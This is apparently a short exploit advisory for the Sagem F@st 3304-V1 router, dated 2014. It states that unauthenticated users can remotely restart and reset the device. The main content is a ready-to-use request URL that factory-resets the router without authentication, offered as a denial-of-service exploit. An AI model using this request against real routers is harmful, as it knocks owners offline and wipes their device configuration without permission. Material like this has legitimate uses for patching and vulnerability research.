# Title : Sagem F@st 3304-V1 denial of service Vulnerability # Vendor Homepage : http://www.sagemcom.com # Tested on : Firefox, Google Chrome # Tested Router : Sagem F@st 3304-V1 # Date : 2014-07-26 # Author : Z3ro0ne # Contact : saadousfar59@gmail.com # Facebook Page : https://www.facebook.com/Z3ro0ne # Vulnerability description : the Vulnerability allow unauthenticated users to remotely restart and reset the router # Exploit: SAGEM FAST3304-V1 DENIAL OF SERVICE
Reset to factory configuration : --- Using Google Chrome browser : to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar